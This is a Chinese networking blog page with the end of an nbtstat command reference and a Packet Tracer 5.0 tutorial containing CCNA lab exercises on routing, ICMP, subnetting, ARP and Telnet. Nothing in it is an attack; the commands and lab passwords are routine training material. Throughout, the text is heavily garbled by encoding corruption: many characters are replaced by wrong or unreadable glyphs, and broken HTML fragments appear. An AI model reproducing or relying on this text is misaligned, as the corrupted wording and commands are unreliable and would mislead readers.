转化为十六进制的 NetBIOS 名称的最后一个字节。每�?NetBIOS 名称长度均�ؓ 16 个字�W�。最后一个字节通常有特�D�的意义�Q�因为相同的名称�Q�只有最后一个字节不同）可能在一台计��机上出现几�ơ。例如，<20> �? ASCII 文本中是一个空根{�?

Type
名称�c�d��。名�U�可以是唯一名称�Q�也可以是组名称�?

Status
�q�程计算��Z��是否在运�?NetBIOS 服务�Q�已注册�Q�，或同一计算机名是否已注册了相同的服务（冲突�Q��?

State
NetBIOS �q�接的状态�?

• 下表描述可能�?NetBIOS �q�接状态�?

State 描述
Connected
会话已徏立�?

Associated
�q�接的终�l�点已经被创建�ƈ�?IP 地址兌��?

Listening
该终�l�点对入站连接可用�?

Idle
该终�l�点已被打开但不能接收连接�?

Connecting
会话处于�q�接阶段。在此阶�D�|��在解析所选目标的由名�U�到 IP 地址的映��?

Accepting
当前正在接受入站会话�Q��ƈ��立卌��接�?

Reconnecting
会话��试��N��新连接（如果�W�一�ơ连接尝试失败）�?

Outbound
会话正处于连接阶�D�c��当前正在创�?TCP �q�接�?

Inbound
入站会话处于�q�接阶段�?

Disconnecting
会话正在断开�q�接�?

Disconnected
本地计算机已断开�q�接�Q��ƈ正等待远�E�系�l�的��认�?

• 只有�?#8220;Internet 协议 (TCP/IP)”协议�?#8220;�|�络�q�接”中安装�ؓ�|�络适配器属性的�l��g�Ӟ��该命令才可用�?

�C�Z��
要显�C?NetBIOS 计算机名�?CORP07 的远�E�计��机�?NetBIOS 名称表，请键入：

nbtstat -a CORP07

要显�C�所分配 IP 地址�?10.0.0.99 的远�E�计��机�?NetBIOS 名称表，请键入：

nbtstat -A 10.0.0.99

要显�C�本地计��机�?NetBIOS 名称表，请键入：

nbtstat -n

要显�C�本地计��机 NetBIOS 名称�~�存的内容，请键入：

nbtstat -c

要清�?NetBIOS 名称�~�存�q��新装载本�?Lmhosts 文�g中带标记 #PRE 的项目，请键入：

nbtstat -R

要释��N��过 WINS 服务器注册的 NetBIOS 名称�q�对光��新注册，请键入：

nbtstat -RR

要每 5 �U�以 IP 地址昄�� NetBIOS 会话�l�计资料�Q�请键入�Q?
nbtstat -S 5

矛_��@ 2009-08-18 21:36 发表评论

Packet Tracer 5.0 用法

矛_��@ — Wed, 12 Aug 2009 01:39:00 GMT

�W�一��、熟悉界�?/strong>

一、设备的选择与连�?/strong>

在界面的左下�?/span>一块区域，�q�里有许多种�cȝ��g讑֤��Q�从左至叻I��从上��C��依次��\由器、交换机、集�U�器、无�U�设备、设备之间的�q�线�Q?/span>Connections�Q�、终端设备、仿真广域网�?/span>Custom Made Devices�Q�自定义讑֤��Q?/u>下面着重讲一�?#8220;Connections”�Q�用鼠标点一下它之后�Q�在双��你会看到各种�c�d��的线�Q�依�ơ�ؓAutomatically Choose Connection Type�Q�自动选线�Q�万能的�Q�一般不��使用�Q�除非你真的不知道设备之间该用什么线�Q�、控制线、直通线、交叉线、光�U�、电话线、同轴电�~��?/span>DCE�?/span>DTE。其�?/span>DCE�?/span>DTE是用于�\由器之间的连�U�，实际当中�Q�你需要把DCE和一台�\由器相连�Q?/span>DTE和另一台设备相�q�。而在�q�里�Q�你只需选一根就是了�Q�若你选了DCE�q�一根线�Q�则和这根线先连的�\由器�?/span>DCE�Q�配�|�该路由器时需配置旉��哦。交叉线只在路由器和电脑直接相连�Q�或交换机和交换��Z��间相�q�时才会用到�?/span>

注释�Q?/strong>那么Custom Made Devices�? 备是做什么的呢？通过实验发现当我们用鼠标单击不放开左键把位于第一行的�W�一个设备也��是Router中的��L��一个拖到工作区�Q�然后再拖一个然后我们尝�? 用串行线Serial DTE�q�接两个路由器时发现�Q�他们之间是不会正常�q�接的，原因是这两个讑֤�初始化对然虽焉��是模块化的，但是没有��d��Q�比如多个串口等�{�。那么，�q�个Custom Made Devices讑֤��比较好了，他会自动��d��一�?#8220;必须讑֤��?#8221;�Q�在实验环境下每�ơ选择讑֤��׃��用手动添加所需讑֤�了，使用��h��很方便，除非你想��d��“用户自定义设�?#8221;里没有的讑֤�再添加也不迟�?/font>

当你需要用哪个讑֤�的时候，先用鼠标单击一下它�Q�然后在中央的工作区域点一下就OK了，或者直接用鼠标摁住�q�个讑֤�把它拖上厅R��连�U�你��选中一�U�线�Q�然后就在要�q�接的线的设备上点一下，选接口，再点另一讑֤��Q�选接口就OK了。注意，接口可不能�ؕ选哦。连接好�U�后�Q�你可以把鼠标指针移到该�q�线上，你就会线两端的接口类型和名称哦，配置的时候要用到它�?/span>

二、对讑֤��q�行�~�辑在右�Ҏ��一个区�?/font>�Q�如�?/span>1.2所�C�，从上��C��依次为选定/取消、移动（��M��U�d��Q�移�?/span>某一讑֤��Q�直接拖动它��可以了�Q��?/span>Place Note�Q�先选中�Q�、删除�?/span>Inspect�Q�选中后，在�\由器�?/span>PC��Z��可看到各�U�表�Q�如路由表等�Q��?/span>simple PPD�?/span>complex�?/span>

500)this.width=500;" border=0>

三、Realtime mode(实时模式)和Simulation mode�Q�模拟模式）

注意到��Y件界面的最右下角有两个切换模式�Q�分别是Realtime mode(实时模式)和Simulation mode�Q�模拟模式）�Q? 实时模式��֐�思意��x��模式�Q�也��是说是真实模式。�D个例子，两台��L��通过直通双�l�线�q�接�q�将他们设�ؓ同一个网�D�，那么A��L��PingB��L��Ӟ��瞬间可以�? 成，对吗�Q�这��是实时模式。而模拟模式呢�Q�切换到模拟模式后主机A的CMD里将不会立即昄��ICMP信息�Q�而是软�g正在模拟�q�个瞬间的过�E�，以�h�c�能够理解的方式展现出来

1)有趣的Flash动画 怎么实现呢，你只需点击Auto Capture�Q�自动捕��P��Q�那么直观、生动的Flash动画��x��C�Z��|�络数据包的来龙去脉……�q�是该��Y件的一大闪光点�Q�随后会举例详细介绍的�?/font>

500)this.width=500;" border=0>

本地��L��PC0对远�E�主机PC2执行Ping命��o

2)单击Simulate mode会出现Event List对话框，该对话框昄��当前捕获到的数据包的详细信息�Q�包�?strong>持箋旉��、源讑֤�、目的设备、协议类型和协议详细信息�Q?/strong>非常直观�Q?/span>

500)this.width=500;" border=0>

3�Q�要了解协议的详�l�信息，请单��L��C�Z��用颜色的协议�c�d��信息Info�Q�这个功能非常强大：很详�l�的OSI模型信息和各层PDU�?/span>

500)this.width=500;" border=0>

�W�二��、设备管�?/strong>

Packet Tracer 5.0提供了很多典型的�|�络讑֤��Q�它们有各自�q�然不同的功能，自然��理界面和��用方式也不同。这里我��׃��一一介绍了，只详�l�介�l�一下PC机和路由器这两个讑֤�的设备管理方法，其他讑֤�大家自行研究�?/font>

一、PC�?/font>

一般情况下�Q�PC��Z��像�\由器有CLI�Q�它只需要在囑�Ş界面下简单地配置一下就行了。一般通过Desktop选项卡下面的IP Configuation��p��实现��单的IP地址、子�|�、网兛_��DNS的配�|�。此外还提供了拨受��终端、命令行�Q�只能执行一般的�|�络命��o�Q�、Web��览�? 和无�U�网�l�功能。如果要讄��PC��动获取IP地址�Q�可以在Config选项卡里的Global Settings讄��?/font>

二、�\由器

选好讑֤��Q�连好线后就可以直接�q�行配置了，然而有些设备，如某些�\由器需��d��一些模块才能用。直接点一下设备，��p��入了其属性配�|�界面。这里只举例介绍路由器和PC机，其他的自��q��I��?/span>

�?/span>Physical�?/span>config�?/span>CLI三个�Q�在Physical中，MODULES�Q�模块）下有许多模块�Q�最常用的有WIC-1T�?/span>WIC-2T。在最下面的左�Ҏ��该对该模块的文字描述�Q�最下面的右�Ҏ��该模块的图�?/span>

在模块的双��是该路由器的图。可看它的上面有许多现成的接口，在图的矩形框中。也有许多空槽，图中用椭圆标出，在空槽上可添加模块，�?/span>WIC-1T�Q?/span>WIC-2T�Q? 用鼠标左键按住该模块不放�Q�拖��C��x��的插槽中卛_��d��Q�不�q�这样你肯定不会成功哦，因�ؓ你还没有关闭甉|��哦。电源位�|�如图所�C�，��是带绿点的那个东西哦。绿色表�C�开哦，路由器默认情况下甉|��是开的哦。用鼠标点一下绿炚w��里，它就会关闭哦。记得添加模块后重新打开甉|��Q�这是�\由器又重新启动了哦。如果你没有��d��WIC-1T�?/span>WIC-2T�q�一模块�Q�当你用DTE�?/span>DCE�U�连接两台�\由器�Q?/span>Router PT除外�Q�时�Q�你会发觉根本连不了�Q�因为它�q�没�?/span>Serial �q�一接口啊，你叫它怎么�q�，哈哈�?/span>

�?/span>Config中，你就可以讄��路由器的昄��名称、查看和配置路由协议与接口，你会发现�q�里�?/span>Serial口了哦。不�q�不推荐在这里进行配�|�哦�Q�在买来的�\由器上你�q�能�q�样做吗�Q�！

CLI��׃��说了�Q�命令行配置界面�Q�也�U�现金行接口�Q�——属于CCNA展现技能的舞台。随后将以例子的方式详细描述�?/span>

�W�三��、实�?/strong>

说了那么多了�Q�这个��Y件到底型不型�Q�我们实战一�?#8230;…

实例1�?strong>研究应用层和传输层协�?/strong>

文�g: pka.rar

大小: 13KB

下蝲: 下蝲

拓扑囑֦�下：

500)this.width=500;" border=0>

地址�?br /> 本练习不包括地址表�?br /> 学习目标
�?PC 使用 URL 捕获 Web ��h��
�q�行模拟�q�捕获通信
研究捕获的通信
��介：
Wireshark 可以捕获和显�C�通过�|�络接口�q�出其所�?PC 的所有网�l�通信。Packet Tracer 的模拟模式可以捕��h��l�整个网�l�的所有网�l�通信�Q�但支持的协议数量有限。�ؓ��可能接�q�实�?4.5.3 的设�|�，我们��用一�?PC 直接�q�接�? Web 服务器网�l�，�q�捕获��?URL 的网��请求�?

��d�� 1�Q�从 PC 使用 URL 捕获 Web ��h��?br /> 步骤 1. �q�行模拟�q�捕获通信�?/u> �q�入 Simulation�Q�模拟）模式。单�?PC。在 Desktop�Q�桌面）上打开 Web Browser�Q�Web ��览器）。在��览器中输入 www.example.com�? 单击 Go�Q��{刎ͼ��会发出 Web 服务器请求。最��化 Web 客户端配�|�窗口。Event List�Q�事件列表）中将会显�C�Z��个数据包�Q�将 URL 解析为服务器 IP 地址所需�?DNS ��h��Q�以及将服务�?IP 地址解析为其��g MAC 地址所需�?ARP ��h��?br /> 单击 Auto Capture/Play�Q�自动捕�?播放�Q�按钮以�q�行模拟和捕获事件。收�?"No More Events"�Q�没有更多事�Ӟ��消息时单�?OK�Q�确定）�?br /> 步骤 2. 研究捕获的通信�?/u> �?Event List�Q�事件列表）中找到第一个数据包�Q�然后单�?Info�Q�信息）列中的彩色正方�Ş。单��M��件列表中数据包的 Info�Q�信息）正方形时�Q�将会打开 PDU Information�Q�PDU 信息�Q�窗口。此�H�口��按 OSI 模型�l�织。在我们查看的第一个数据包中，注意 DNS 查询�Q�第 7 层）��装在第 4 层的 UDP 数据�D�中�Q�等�{�。如果单击这些层�Q�将会显�C��备（本例中�ؓ PC�Q��用的��法。查看每一层发生的事�g�?br /> 打开 PDU Information�Q�PDU 信息�Q�窗口时�Q�默认显�C?OSI Model�Q�OSI 模型�Q�视图。此时单�?Outbound PDU Details�Q�出�?PDU 详细数据�Q�选项卡。向下滚动到此窗口的底部�Q�您��会看到 DNS 查询�?UDP 数据�D�中��装成数据，�q�且��装�? IP 数据包中�?br /> 查看 PDU 信息�Q�了解交换中的其余事件�?br /> 在此��d��l�束�Ӟ��完成率应�?100%�?

实例2�?strong>��查�\�?

文�g: pka.rar

大小: 61KB

下蝲: 下蝲

拓扑囑֦�下：

500)this.width=500;" border=0>

地址�?br /> 本练习不包括地址表�?br /> 学习目标
使用 route 命��o查看 PT-PC 路由�?
使用命��o提示�W?telnet �q�接�?Cisco 路由�?
使用基本�?Cisco IOS 命��o��查�\由器的�\由�?
��介：
�? 通过�|�络传输数据包，讑֤�必须知道通往目的�|�络的�\由。本实验��比较在 Windows 计算机和 Cisco 路由器中分别是如何��用�\��q��。有些�\由已�Ҏ��|�络接口的配�|�信息被自动��d��C��路由表中。若�|�络配置�?IP 地址和网�l�掩码，讑֤�会认��|�络已直接连接，�|�络路由也会被自动输入到路由表中。对于没有直接连接但配置了默认网�?IP 地址的网�l�，��发送通信到知道该�|�络的设备�?/div>
��d�� 1�Q�查看�\��p��
步骤 1. 讉K��命��o提示�W��?br /> 单击 PC> Desktop�Q�桌面）选项�?gt; Command Prompt�Q�命令提�C�符�Q?br /> 步骤 2. 键入 netstat -r 以查看当前的路由表�?br /> 注意�Q�Packet Tracer 4.1 不支持用于检�?PC 上活动�\��q�� ROUTE 命��o。与 netstat -r 命��o不同�Q�route 命��o可用于查看、添加、删除或更改路由表条目�?
在此��d��l�束�Ӟ��完成率应�?100%�?/div>
��d�� 2�Q��用命令提�C�符 Telnet �q�接到�\由器
步骤 1. 使用命��o提示�W�作�?Telnet 客户端�?br /> �? �?PC > Desktop�Q�桌面）选项�?gt; Command Prompt�Q�命令提�C�符�Q�打开命��o提示�W�窗口。然后键入命�? telnet 及远�E��\由器默认�|�关�?IP 地址 (172.16.255.254)。需要输入的用户名�ؓ ccna1�Q�口令�ؓ cisco�?
注意�Q�键入时看不到口令�?br /> 在此��d��l�束�Ӟ��完成率应�?100%�?/div>
��d�� 3�Q��用基本的 Cisco IOS 命��o��查�\由器的�\�?br /> 步骤 1. 学习�Ҏ��模式
��d��到远�E��\由器之后�Q�键�?enable �q�入�Ҏ��模式。此处需要输入的口��o�?class�?在键入时仍然看不到口令�?br /> 步骤 2. 输入命��o以显�C��\由器的�\��p��?
使用 show ip route 命��o昄��路由表，它比��L��计算��Z��昄��的�\��p��更加详细。这是正常行为，因�ؓ路由器的工作��是在网�l�之间�\由通信�?/font>

IP 掩码信息如何昄��在�\由器的�\��p��中？
在此��d��l�束�Ӟ��完成率应�?100%�?

实例3�?strong>研究 ICMP 数据�?/strong>

文�g: pka.rar

大小: 34KB

下蝲: 下蝲

拓扑囑֦�下：
500)this.width=500;" border=0>

学习目标
了解 ICMP 数据包的格式
使用 Packet Tracer 捕获�q�研�I?ICMP 报文
��介：
Wireshark 可以捕获和显�C�通过�|�络接口�q�出其所�?PC 的所有网�l�通信。Packet Tracer 的模拟模式可以捕��h��l�整个网�l�的所有网�l�通信�Q�但支持的协议数量有限。�ؓ��可能接�q�实�?6.7.2 的设�|�，我们使用的网�l�中包含一台通过路由器连接到服务器的 PC�Q��ƈ且可以捕获从 PC 发出�?ping 命��o的输出�?

��d�� 1�Q��?Packet Tracer 捕获和研�I?ICMP 报文�?br /> 步骤 1. 捕获�q�评估到�?Eagle Server �?ICMP 回应报文�?/font> �q�入 Simulation�Q�模拟）模式。Event List Filters�Q�事件列表过滤器�Q�设�|��ؓ只显�C?ICMP 事�g。单�?Pod PC。从 Desktop�Q�桌面）打开 Command Prompt�Q�命令提�C�符�Q��?输入命��o ping eagle-server.example.com �q�按 Enter 键。最��化 Pod PC 配置�H�口。单�?Auto Capture/Play�Q�自动捕�?播放�Q�按钮以�q�行模拟和捕获事件。收�?"No More Events"�Q�没有更多事�Ӟ��消息时单�? OK�Q�确定）�?/div>
�?Event List�Q�事件列表）中找到第一个数据包�Q�即�W�一条回应请求，然后单击 Info�Q�信息）列中的彩色正方�Ş。单��M��件列表中数据包的 Info�Q�信息）正方形时�Q�将会打开 PDU Information�Q�PDU 信息�Q�窗口。单�?Outbound PDU Details�Q�出�?PDU 详细数据�Q�选项卡以查看 ICMP 报文的内宏V��请注意�Q�Packet Tracer 只显�C?TYPE�Q�类型）�?CODE�Q�代码）字段�?/div>
要模�?Wireshark 的运行，请在其中 At Device�Q�在讑֤��Q�显�C�Zؓ Pod PC 的下一个事件中�Q�单��d��彩色正方形。这是第一条应�{�。单�?Inbound PDU Details�Q�入�?PDU 详细数据�Q�选项卡以查看 ICMP 报文的内宏V�?br /> 查看 At Device�Q�在讑֤��Q��ؓ Pod PC 的其余事件。完成时单击 Reset Simulation�Q�重�|�模拟）按钮�?
步骤 2. 捕获�q�评估到�?192.168.253.1 �?ICMP 回应报文�?/strong> 使用 IP 地址 192.168.253.1 重复步骤 1。观看动画，注意哪些讑֤�参与交换�?
步骤 3. 捕获�q�评估超�q?TTL 值的 ICMP 回应报文�?Packet Tracer 不支�?ping -i 选项。在模拟模式中，可以使用 Add Complex PDU�Q�添加复�?PDU�Q�按钮（开口的信封�Q�设�|?TTL�?/div>
单击 Add Complex PDU�Q�添加复�?PDU�Q�按钮，然后单击 Pod PC�Q�源�Q�。将会打开 Create Complex PDU�Q�创建复�?PDU�Q�对话框。在 Destination IP Address:�Q�目�?IP 地址�Q�）字段中输�? 192.168.254.254。将 TTL: 字段中的值改�?1。在 Sequence Number�Q�序列号�Q�字�D�中输入 1。在 Simulation Settings�Q�模拟设�|�）下选择 Periodic�Q�定期）选项。在 Interval�Q�时间间隔）字段中输�?2。单�? Create PDU�Q�创�?PDU�Q�按钮。此操作�{�同于从 Pod PC 上的命��o提示�W�窗口发出命�?ping -t -i 1 192.168.254.254�?/div>
重复单击 Capture/Forward�Q�捕�?转发�Q�按钮，以在 Pod PC 与�\由器之间生成多次交换�?/div>
�?Event List�Q�事件列表）中找到第一个数据包�Q�即�W�一个回应请求。然后单�? Info�Q�信息）列中的彩色正方�Ş。单��M��件列表中数据包的 Info�Q�信息）正方形时�Q�将会打开 PDU Information�Q�PDU 信息�Q�窗口。单�?Outbound PDU Details�Q�出�?PDU 详细数据�Q�选项卡以查看 ICMP 报文的内宏V�?/div>
要模�?Wireshark 的运行，请在其中 At Device�Q�在讑֤��Q��ؓ Pod PC 的下一个事件中�Q�单��d��彩色正方形。这是第一条应�{�。单�?Inbound PDU Details�Q�入�?PDU 详细数据�Q�选项卡以查看 ICMP 报文的内宏V�?br /> 查看 At Device�Q�在讑֤��Q��ؓ Pod PC 的其余事件�?
在此��d��l�束�Ӟ��完成率应�?100%�?

实例4�?strong>子网和�\由器配置

拓扑囑֦�下：

文�g: pka.rar

大小: 28KB

下蝲: 下蝲

500)this.width=500;" border=0>

地址�?br /> 本练习不包括地址表�?br /> 学习目标
�Ҏ��要求划分子网的地址�I�间
分配适当的地址�l�接口�ƈ�q�行记录
配置�q�激�z?Serial �?FastEthernet 接口
��试和验证配�|?
思考网�l�实施�ƈ整理成文�?
��介：
在本 PT �l�习中，需要�ؓ拓扑图中昄��的拓扑设计�ƈ应用 IP �~�址�Ҏ��。将会�ؓ您分配一个地址块，您必��d��分子�|�，为网�l�提供逻辑�~�址�Ҏ��。然后就可以�Ҏ�� IP �~�址�Ҏ��配置路由器接口地址。当配置完成�Ӟ��请验证网�l�可以正常运作�?/div>
��d�� 1�Q�划分子�|�的地址�I�间�?/strong>
步骤 1. ��查网�l�要求�?/u>
已经�?192.168.1.0/24 地址块供您用于网�l�设计。网�l�包含以下网�D�：
�q�接到�\由器 R1 �?LAN 要求��h��能够支持 15 ��C��机的 IP 地址�?nbsp;
�q�接到�\由器 R2 �?LAN 要求��h��能够支持 30 ��C��机的 IP 地址�?nbsp;
路由�?R1 与�\由器 R2 之间的链路要求链路的每一端都�?IP 地址�?
不要在本�l�习中��用可变长子网划分�?
步骤 2. 在设计网�l�时要考虑以下问题�?/u>
在笔记本或单独的�U�张中回�{�以下问题�?br /> 此网�l�需要多��个子网�Q?
此网�l�以点分十进制格式表�C�的子网掩码是什么？
此网�l�以斜杠格式表示的子�|�掩码是什么？
每个子网有多��台可用的主机？
步骤 3. 分配子网地址�l�拓扑图�?/u>
分配�W�二个子�|�给�q�接�?R1 的网�l��?
分配�W�三个子�|�给 R1 �?R2 之间的链路�?
分配�W�四个子�|�给�q�接�?R2 的网�l��?
在此��d��l�束�Ӟ��完成率应�?0%�?

��d�� 2�Q�确定接口地址�?
步骤 1�Q�分配适当的地址�l�设备接口�?/u>
分配�W�二个子�|�中�W�一个有效的��L��地址�l?R1 �?LAN 接口�?
分配�W�二个子�|�中最后一个有效的��L��地址�l?PC1�?
分配�W�三个子�|�中�W�一个有效的��L��地址�l?R1 �?WAN 接口�?
分配�W�三个子�|�中最后一个有效的��L��地址�l?R2 �?WAN 接口�?
分配�W�四个子�|�中�W�一个有效的��L��地址�l?R2 �?LAN 接口�?
分配�W�四个子�|�中最后一个有效的��L��地址�l?PC2�?
步骤 2�Q�在拓扑图下的表中记录要使用的地址�?
在此��d��l�束�Ӟ��完成率应�?0%�?

��d�� 3�Q�配�|?Serial �?FastEthernet 的地址�?/font>
步骤 1�Q�配�|��\由器接口�?/u>
要完�?Packet Tracer 中的�l�习�Q�需要��?Config�Q�配�|�）选项卡。完成后�Q�务必保存运行配�|�到路由器的 NVRAM�?br /> 注意�Q�必��L��开接口的端口状态�?br /> 注意�Q�所�?DCE 串行�q�接的时钟速率均�ؓ 64000�?br /> 步骤 2�Q�配�|?PC 接口�?/u>
使用�|�络设计中确定的 IP 地址和默认网��x��配置 PC1 �?PC2 的以太网接口�?
在此��d��l�束�Ӟ��完成率应�?100%�?

��d�� 4�Q�验证配�|��?/font>
回答下列问题�Q�验证网�l�能否正常运行�?
能否从连接到 R1 的主�?ping 默认�|�关�Q?
能否从连接到 R2 的主�?ping 默认�|�关�Q?
能否从�\由器 R1 ping R2 �?Serial 0/0/0 接口�Q?
能否从�\由器 R2 ping R1 �?Serial 0/0/0 接口�Q?
注意�Q�要想从路由器执�?ping�Q�必��{�?CLI 选项卡�?br /> 在此��d��l�束�Ӟ��完成率应�?100%�?

实例5、研�I�第 2 层��?/font>

文�g: pka.rar

大小: 42KB

下蝲: 下蝲

拓扑囑֦�下：

500)this.width=500;" border=0>

学习目标
研究�|�络
�q�行模拟
��介：
�?IP 数据包通过�|�间�Ӟ��可封装在许多不同的第 2 层��中。Packet Tracer 支持以太�|�、Cisco 的私�?HDLC、基�?PPP �?IETF 标准以及�W?2 层的帧中�l�。当数据包在路由器之间传送时�Q�第 2 层�ឮ�会解封�Q�而数据包��封装在出站接口的第 2 层��中。本�l�习��跟�t�网间的 IP 数据包，研究不同的第 2 层封装�?

��d�� 1�Q�研�I�网�l?/font>
步骤 1. 研究路由器之间的链�\

PC1 通过四个路由器连接到 PC2。这些�\由器之间的三条链路各自��用不同的�W?2 层封装。Cisco1 �?Cisco2 之间的链路��?Cisco 的私�?HDLC�Q�Cisco2 �?Brand X 之间的链路��用基�?PPP �?IETF 标准�Q�因�? Brand X 不是 Cisco 路由器；Brand X �?Cisco3 之间的链路��用��中��通过服务提供商网�l�，以降低成本（与��用专用链路相比）�?
步骤 2. 在实时模式中验证�q�通�?/u>

�?PC1 �?Command Prompt�Q�命令提�C�符�Q?ping PC2 �?IP 地址。��用命�?ping 192.168.5.2。如�?ping ��时�Q�请重复该命令直臛_��成功。可能需要尝试多�ơ才能覆盖网�l��?/div>
��d�� 2�Q�运行模�?/strong>
步骤 1. 开始模�?/u>

�q�入模拟模式。PC1 �?PDU 是发往 PC2 �?ICMP 回应��h��。单��M��?Capture/Forward�Q�捕�?转发�Q�按钮直�?PDU 到达路由�?Cisco1�?
步骤 2. 研究�W?2 层封�?/u>

单击路由�?Cisco1 上的 PDU。将会打开 PDU Information�Q�PDU 信息�Q�窗口。单�?Inbound PDU Details�Q�入�?PDU 详细数据�Q�选项卡。入站第 2 层封装是以太�|?II�Q�因为��来自 LAN。单�?Outbound PDU Details�Q�出�?PDU 详细数据�Q�选项卡。出站第 2 层封装是 HDLC�Q�因为��要发送到路由�?Cisco2�?/div>
再次单击 Capture/Forward�Q�捕�?转发�Q�按钮。重复此�q�程�Q�因�?PDU ��沿着通往 PC2 的�\径到达每个�\由器。要注意�W?2 层封装在每一跳的变化。另��h��意，已封装的 IP 数据包不会改变�?/div>

实例6、地址解析协议 (ARP)

文�g: pka.rar

大小: 50KB

下蝲: 下蝲

拓扑囑֦�下：

500)this.width=500;" border=0>

地址�?br /> 本练习不包括地址表�?br /> 学习目标
使用 Packet Tracer �?arp 命��o
使用 Packet Tracer ��?ARP 交换
��介：
TCP/IP 使用地址解析协议 (ARP) ��第 3 �?IP 地址映射到第 2 �?MAC 地址。当帧进入网�l�时�Q�必定有目的 MAC 地址。�ؓ了动态发现目的设备的 MAC 地址�Q�系�l�将�?LAN 上广�?ARP ��h��。拥有该目的 IP 地址的设备将会发出响应，而对应的 MAC 地址��记录到 ARP �~�存中。LAN 上的每台讑֤�都有自己�?ARP �~�存�Q�或者利�?RAM 中的一��块区域来保�?ARP �l�果�?ARP �~�存定时器将会删除在指定旉��D�内未��用的 ARP 条目。具体时间因讑֤�而异。例如，有些 Windows 操作�pȝ��存储 ARP �~�存条目的时间�ؓ 2 分钟�Q�但如果该条目在�q�段旉��内被再次使用�Q�其 ARP 定时器将廉��?10 分钟。ARP 是性能折衷的极佳示例。如果没有缓存，每当帧进入网�l�时�Q�ARP 都必��M��断请求地址转换。这样会廉��通信的�g�Ӟ��可能会造成 LAN 拥塞。反之，无限制的保存旉��可能��D��d��|�络的设备出错或更改�W?3 层地址。网�l�工�E�师必须了解 ARP 的工作原理，但可能不会经�怸�协议交互。ARP 是一�U��ɾ|�络讑֤�可以通过 TCP/IP 协议�q�行通信的协议。如果没�?ARP�Q�就没有建立数据报第 2 层目的地址的有效方法。但 ARP 也是潜在的安全风险。例如，ARP �ƺ骗�?ARP 中毒��是��d��者用来将错误�?MAC 地址兌��攑օ��|�络的技术。攻击者伪造设备的 MAC 地址�Q�致使��发送到错误的目的地。手动配�|�静�?ARP 兌��是预�?ARP �ƺ骗的方法之一。您也可以在 Cisco 讑֤�上配�|�授权的 MAC 地址列表�Q�只允许认可的设备接入网�l��?/div>
��d�� 1�Q��?Packet Tracer �?arp 命��o
步骤 1. 讉K��命��o提示�W�窗口�?/u> 单击 PC 1A �?Desktop�Q�桌面）中的 Command Prompt�Q�命令提�C�符�Q�按钮。arp 命��o只显�C?Packet Tracer 中可用的选项�?
步骤 2. 使用 ping 命��o�?ARP �~�存中动态添加条目�?br /> ping 命��o可用于测试网�l�连通性。通过讉K��其它讑֤��Q�ARP
兌��会被动态添加到 ARP �~�存中。在 PC 1A �?ping 地址 255.255.255.255�Q��ƈ发出 arp -a 命��o查看获取�?MAC 地址�?
在此��d��l�束�Ӟ��完成率应�?100%�?

��d�� 2�Q��?Packet Tracer ��?ARP 交换
步骤 1. 配置 Packet Tracer 捕获数据包�?/u>
�q�入模拟模式。确�?Event List Filters�Q�事件列表过滤器�Q�只昄�� ARP �?ICMP 事�g�?
步骤 2. 准备 Pod ��L��计算��Z��执行 ARP 捕获�?/u>
�?PC 1A 上��?Packet Tracer 命��o arp -d�?然后 Ping 地址 255.255.255.255�?br /> 步骤 3. 捕获�q�评�?ARP 通信�?br /> 在发�?ping 命��o之后�Q�单�?Auto Capture/Play�Q�自动捕�?播放�Q�捕��h��据包。当 Buffer Full�Q�缓冲区已满�Q�窗口打开�Ӟ��单击 View Previous Events�Q�查看以前的事�g�Q�按钮�?
在此��d��l�束�Ӟ��完成率应�?100%�?

实例7、中间设备用作终端设�?/strong>

文�g: pka.rar

大小: 52KB

下蝲: 下蝲

拓扑囑֦�下：

500)this.width=500;" border=0>

地址�?br /> 本练习不包括地址表�?br /> 学习目标
捕获 Telnet 会话的徏立过�E?
研究 PC �?Telnet 数据包的交换
��介：
�q�个 Packet Tracer �l�习�{�同�?#8220;实验 9.8.3�Q�中间设备用作终端设�?#8221;。鉴�?Packet Tracer 的局限性以及交换的数据量，本练习限于捕获从 PC ��C��换机�?Telnet �q�接�?/div>
��d�� 1�Q�初始化所有网�l�表
Step 1.完成生成树协议�?/u>
在实时与模拟模式之间切换 4 �ơ，完成生成树协议。所有链路指�C�灯应变为绿艌Ӏ�将 PT 保留在实时模式中�?br /> 步骤 2. Ping 交换机�?/u>

讉K�� PC 1A�Q�从 Desktop�Q�桌面）打开 Command Prompt�Q�命令提�C�符�Q�，输入命��o ping 172.16.254.1。这��更�?PC 及交换机�?ARP 信息�?

��d�� 2�Q�捕�?Telnet 会话的徏立过�E?br /> 步骤 1. �q�入模拟模式�?br /> 切换到模拟模式�?
步骤 2�Q�设�|�事件列表过滤器�?/u>
我们只需要捕�?Telnet 事�g。在 Event List Filters�Q�事件列表过滤器�Q�区域，��认只显�C?Telnet 事�g�?
步骤 3. �?PC 1A Telnet �q�接��C��换机�?/u>
�?PC 1A �?Command Prompt�Q�命令提�C�符�Q�中�Q�输入命�?telnet 172.16.254.1�?�?Trying Telnet�Q�正在尝�?Telnet�Q�显�C�时�Q��l�下一步�?
步骤 4. �q�行模拟�?/u>
�? �?Auto Capture/Play�Q�自动捕�?播放�Q�按钮。恢�?PC 1A �H�口。当提示输入口��o�Ӟ��输入 cisco �q�按 Enter 键。最��化 PC 1A �H�口。当 Buffer Full�Q�缓冲区已满�Q�窗口出现时�Q�单�?View Previous Events�Q�查看以前的事�g�Q�按钮�?/div>
�Ҏ��提示输入 ccna1 作�ؓ用户名，输入 cisco 作�ؓ口��o�?
在此��d��l�束�Ӟ��完成率应�?100%�?

��d�� 3�Q�研�I?PC 1A 上的 Telnet 数据包交�?br /> 步骤 1. 研究��装�?Telnet 数据�?br /> �? 模拟 Wireshark 的运行，��L��I�数据包 At Device�Q�在讑֤��Q?1A。在 Inbound PDU Details�Q�入�?PDU 详细数据�Q�和 Outbound PDU Details�Q�出�?PDU 详细数据�Q�中��查封装的 Telnet 数据�?
步骤 2. 考虑 Telnet 的运行�?/u>
恢复 PC 1A �H�口。将输出与封装的 Telnet 数据�q�行比较。封装的 Telnet 数据中是否包含口令？
在此��d��l�束�Ӟ��完成率应�?100%�?/div>

实例8、管理设备配�|?/font>

用户注意�Q?本练习是实验 11.5.2 的变异，而不是上�q�实验的附属。本实验中提供了如何完成实验的说明�?

文�g: pka.rar

大小: 41KB

下蝲: 下蝲

拓扑囑֦�下：

500)this.width=500;" border=0>

地址�?/div>
500)this.width=500;" border=0>

学习目标
执行基本的�\由器配置
备䆾路由器配�|�文�?
�?TFTP 服务器将备䆾配置文�g重新加蝲到�\由器�?RAM �?
保存新的�q�行配置�?NVRAM
��介：
